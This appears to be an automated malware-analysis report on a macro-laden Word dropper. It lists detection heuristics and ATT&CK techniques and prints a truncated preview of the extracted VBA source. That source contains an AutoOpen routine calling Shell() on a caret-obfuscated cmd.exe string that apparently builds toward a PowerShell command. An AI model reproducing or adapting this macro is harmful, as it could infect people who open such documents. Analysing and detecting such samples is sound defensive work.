Verdict: MALICIOUS (Risk Score: 242)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The AutoOpen macro calls the uaioO function, which invokes Shell(); this fires a critical heuristic. It indicates the macro is designed to execute arbitrary commands, likely to download and execute a secondary payload. The string fragments concatenated in the second module (RUfWdaWXn) build a caret-obfuscated cmd.exe command line using %ComSpec%, /V delayed expansion and a chain of set statements, although the preview is truncated before the final command is fully assembled. The ClamAV detection further confirms its malicious nature.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6572067-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6572067-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19165 bytes |

SHA-256 (macros.bas): b209a22d1cf6318c1bf679c6600fc43397c94d823e056748ce159abb87a67999
Preview script: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "YsowKMiNPtzHL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function uaioO()
On Error Resume Next
For FAmaIU = RfYdKF To 89020
iFihH = (AqPHi - ChrW(37080 * 33991) * tiQGVt * CInt(mfHaIS + Sqr(45094)) + 48797 - 47925 / 91517 - CDate(KmHfaH - 78144 + 50625 - Hex(KWTiB / 19142)) + (mtNEkA * Tan(vabGz)))
Next
For dRqLwJ = jNEIRv To 77745
PMdZwp = (fLrvJT - ChrW(23088 * 10360) * Apicsj * CInt(frivZ + Sqr(79956)) + 8731 - 74443 / 79496 - CDate(njNwh - 890 + 11729 - Hex(lfUCzL / 40292)) + (EIcQM * Tan(jFzhTu)))
Next
uaioO = JwEHDV + Shell(zzjXzlj + Chr(NtTnJ + vbKeyC + oHfGYpfCbl) + RUfWdaWXn + bzGrCqQiYvX + IdKUZ + ZwKKPHSqB + cuBcUs + FHnJOdXWaq + qOCotn, NsHcMfl + 0 + KpwBwoq)
For qGEGz = frBTpY To 69160
AmdsT = (QkwKYz - ChrW(150 * 92804) * BzjLj * CInt(YQwCio + Sqr(31931)) + 7015 - 79778 / 75134 - CDate(cjiSTp - 216 + 37650 - Hex(FKthzj / 68684)) + (ATIMDL * Tan(WhpolA)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For GXjXTN = hJjslq To 25474
OFwFh = (VifYU - ChrW(12297 * 92643) * zLiuYE * CInt(AZMWs + Sqr(35931)) + 18502 - 53230 / 38738 - CDate(UPzSk - 81681 + 62141 - Hex(dksBw / 98035)) + (uuJVK * Tan(SIAOfl)))
Next
uaioO
For okMDLH = rwUPU To 3256
uTdzaN = (wXzGJ - ChrW(51223 * 4729) * zEEEz * CInt(sYpprw + Sqr(30464)) + 95607 - 51010 / 89178 - CDate(IPXoW - 28051 + 9474 - Hex(TqNMw / 3132)) + (zkwQKQ * Tan(wBvoJ)))
Next
End Sub
Attribute VB_Name = "OzAzFFBLiRdp"
Function RUfWdaWXn()
On Error Resume Next
For PkXjRD = iZQdW To 90171
PWlJN = (FFusn - ChrW(10962 * 38774) * jQNtbp * CInt(MBTaX + Sqr(5201)) + 82056 - 48092 / 12151 - CDate(lOXlHO - 4629 + 27824 - Hex(kJpiw / 22749)) + (FzICku * Tan(LDURi)))
Next
jqVTjfYMc = "md wUaukPaOz" + "zEjo RVk" + "LwEfowNSjilJQ " + "fbiMkzL & " + " " + "%^c^" + "o^m^S^" + "p^E^"
For FPjowC = wLZCLf To 7127
BWWXO = (zsQDJq - ChrW(16080 * 24243) * mwTYSV * CInt(BjtUmt + Sqr(47590)) + 10961 - 83719 / 9797 - CDate(BJjwuU - 4159 + 15181 - Hex(QkoLj / 68581)) + (mGrHki * Tan(VqduB)))
Next
FikiSlnUoO = "c^%" + " %^c^o^" + "m^S^p^E^c^% " + " /V " + " /c " + " s" + "et %ALfbNiVMXu" + "amiWp%=IYYjSjsc"
For UKMEz = CBoBz To 42030
zMQrh = (DPlzAz - ChrW(11825 * 34917) * KHQaAE * CInt(FYjMc + Sqr(63033)) + 53831 - 97361 / 9953 - CDate(lajMFw - 92435 + 18047 - Hex(oiLMGt / 79054)) + (rjkYV * Tan(zGrIV)))
Next
JXiipEtzKf = "n&&set %" + "iBhv" + "bvN%=p&&set " + "%viCYOjhHti" + "%=o^" + "w&&set" + " %hwEMjElmA"
For WnntH = jiXFJ To 39916
CPTtM = (TmOkSU - ChrW(37729 * 30961) * mGNqa * CInt(bAuRE + Sqr(88589)) + 25508 - 12422 / 89371 - CDate(XPHSqd - 25320 + 59448 - Hex(CVHCVZ / 76867)) + (MwRrTt * Tan(aPZbI)))
Next
aJbXp = "wtzMjX%" + "=FInLXljqOZ" + "oMQ&&set %Fp" + "EOMNJ%=!%"
For FjUzuE = zcIsi To 20686
iTzZs = (zAJct - ChrW(8187 * 42390) * sbElWw * CInt(pnDaUc + Sqr(98589)) + 69821 - 76606 / 47663 - CDate(IVlGR - 98706 + 67294 - Hex(lFWrFq / 66320)) + (FBEHL * Tan(cpjuz)))
Next
XvmsUBvXp = "iBhvbvN%" + "!&&set %sQT" + "CnfjRAopp" + "zda%=NvoAoNaERQ" + "vOOz&&set %dw" + "HvjtWGJI" + "j%=e^r&&" + "set"
For owQWD = vAGlJF To 4904
LqSwzj = (IujjRz - ChrW(88749 * 85615) * aXALDn * CInt(AnVuhN + Sqr(37799)) + 83585 - 98228 / 9291 - CDate(ClWjwP - 72026 + 61676 - Hex(jmmmB / 16157)) + (LmFrc * Tan(BSJbp)))
Next
hWIpdniqovw = " %JdwwfjQLaKN" + "E%=!%v" + "iCYOjhHti%!&&" + "set %tmF" + "DiIOv" + "N%=s&&set %"
For uarkM = rGZqa To 70625
XjINA = (sZDIFu - ChrW(25914 * 8292) * kEaVaj * CInt(dpBaWK + Sqr(3249)) + 70687 - 39251 / 22640 - CDate(RFotE - 16462 + 86812 - Hex(fqRmqz / 24118)) + (WVQFK * Tan(lFTLaM)))
Next
LitQZqa = "KQYVHfZzZ" + "DraFUw" + "%=XH" + "IuAdzLcf" + "&&set %VwhcHC" + "KfE%=h" + "e&&set %IlqHW" + "FA%=ll&&!%FpEOM"
For XTotZv = qqzRcd To 2048
LCLaJw = (PEGJYT
... (truncated)